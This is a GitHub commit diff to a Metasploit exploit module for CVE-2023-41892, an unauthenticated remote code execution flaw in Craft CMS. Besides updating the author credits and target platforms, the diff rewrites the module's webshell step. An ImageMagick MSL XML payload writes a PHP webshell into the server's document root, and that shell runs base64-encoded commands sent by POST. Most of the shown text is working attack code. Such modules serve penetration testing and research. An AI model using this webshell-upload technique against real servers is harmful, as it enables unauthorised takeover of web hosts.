Skip to content

Commit

Permalink
Final update to the module based on cdelafuente-r7 comments
Browse files Browse the repository at this point in the history
  • Loading branch information
h00die-gr3y committed Dec 21, 2023
1 parent 5d7cf90 commit 4c40476
Showing 1 changed file with 7 additions and 24 deletions.
31 changes: 7 additions & 24 deletions modules/exploits/linux/http/craftcms_unauth_rce_cve_2023_41892.rb
Original file line number Diff line number Diff line change
Expand Up @@ -35,8 +35,9 @@ def initialize(info = {})
access to the underlying operating system as the user that the web services are running as (typically www-data).
},
'Author' => [
'chybeta', # discovery
'h00die-gr3y <h00die.gr3y[at]gmail.com>' # Metasploit module
'h00die-gr3y <h00die.gr3y[at]gmail.com>', # Metasploit module
'Thanh', # discovery
'chybeta' # poc
],
'References' => [
[ 'CVE', '2023-41892' ],
Expand Down Expand Up @@ -64,7 +65,7 @@ def initialize(info = {})
[
'Unix Command',
{
'Platform' => 'unix',
'Platform' => [ 'unix', 'linux' ],
'Arch' => ARCH_CMD,
'Type' => :unix_cmd,
'DefaultOptions' => {
Expand Down Expand Up @@ -168,11 +169,11 @@ def upload_webshell
EOS
else
# create the MSL payload
# payload = "<?=$_GET[\'#{@get_param}\'](base64_decode($_POST[\'#{@post_param}\']));?>"
# payload = "<?=#{datastore['COMMAND']}(base64_decode($_POST[\'#{@post_param}\']));?>"
payload = <<~EOS
<?xml version="1.0" encoding="UTF-8"?>
<image>
<read filename="caption:&lt;?=$_GET[\'#{@get_param}\'](base64_decode($_POST[\'#{@post_param}\'])); ?&gt;" />
<read filename="caption:&lt;?=#{datastore['COMMAND']}(base64_decode($_POST[\'#{@post_param}\'])); ?&gt;" />
<write filename="info:#{@config['document_root']}/#{@webshell_name}" />
</image>
EOS
Expand Down Expand Up @@ -210,28 +211,12 @@ def upload_webshell
false
end

def execute_php(cmd, _opts = {})
payload = Base64.strict_encode64(cmd)
return send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(datastore['TARGETURI'], @webshell_name),
'ctype' => 'application/x-www-form-urlencoded',
'vars_post' => {
@post_param => payload
}
})
end

def execute_command(cmd, _opts = {})
payload = Base64.strict_encode64(cmd)
php_cmd_function = datastore['COMMAND']
return send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(datastore['TARGETURI'], @webshell_name),
'ctype' => 'application/x-www-form-urlencoded',
'vars_get' => {
@get_param => php_cmd_function
},
'vars_post' => {
@post_param => payload
}
Expand Down Expand Up @@ -274,9 +259,7 @@ def exploit

print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
case target['Type']
when :php
execute_php(payload.encoded)
when :unix_cmd
when :php, :unix_cmd
execute_command(payload.encoded)
when :linux_dropper
execute_cmdstager(linemax: 65536)
Expand Down

0 comments on commit 4c40476

Please sign in to comment.